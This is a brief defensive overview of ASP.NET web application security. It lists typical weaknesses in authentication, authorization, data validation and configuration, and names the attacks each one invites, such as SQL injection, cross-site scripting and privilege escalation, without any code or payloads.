There is a wide array of attacks that ASP.NET web
applications need to protect against but most security holes are due to flaws
in the following:
Authentication
Making it easy for attackers to reveal
users credentials, or worse to circumvent application’s authentication all
together.
Possible deficiencies:
lack of password policy (strong passwords, expiration date etc), passing
internal messages back to the browser, using dynamic SQL on the login page (SQL
injection), using cookies and other insecure means to store users’ credentials,
and passing user names and passwords in clear text .
Possible attacks:
Network eavesdropping, brute force & dictionary attacks, SQL injection (on
login page), Cookie replay attacks and credential theft.
Authorization
Allowing logged-in users to perform actions
without authorization verification (i.e. vertical & horizontal privilege
escalation).
Possible deficiencies:
inconsistent checks for user authorization for every user’s request and web
page, lack of data validation and trusting data submitted by users (i.e.
cookies, hidden fields, URL parameters etc).
Possible attacks:
privilege escalation attacks (horizontal and vertical), Disclosure of
confidential data and Data tampering attacks.
Data Validation
Trusting data submitted by the user and
acting upon it.
Possible deficiencies:
lack of consistent and strict data validation throughout the web, and failing
to encode data sent to the browser.
Common Attacks:
Cross site-scripting (XSS), SQL injection, data tampering (query string, form
fields, cookies, and HTTP headers), embedded malicious characters and HTTP
response splitting.
Application Configuration
Using default configuration on the
application and hosted server.
Possible deficiencies:
granting the application more permissions than it actually needs, failing to
properly secure resources (operating system, database etc) and passing internal
application information back to the browser (internal messages, exceptions and
trace information).
Common Attacks:
unauthorized access to administrator functionality, unauthorized access to
configuration information, retrieval of clear text configuration information
and unauthorized access to data stores.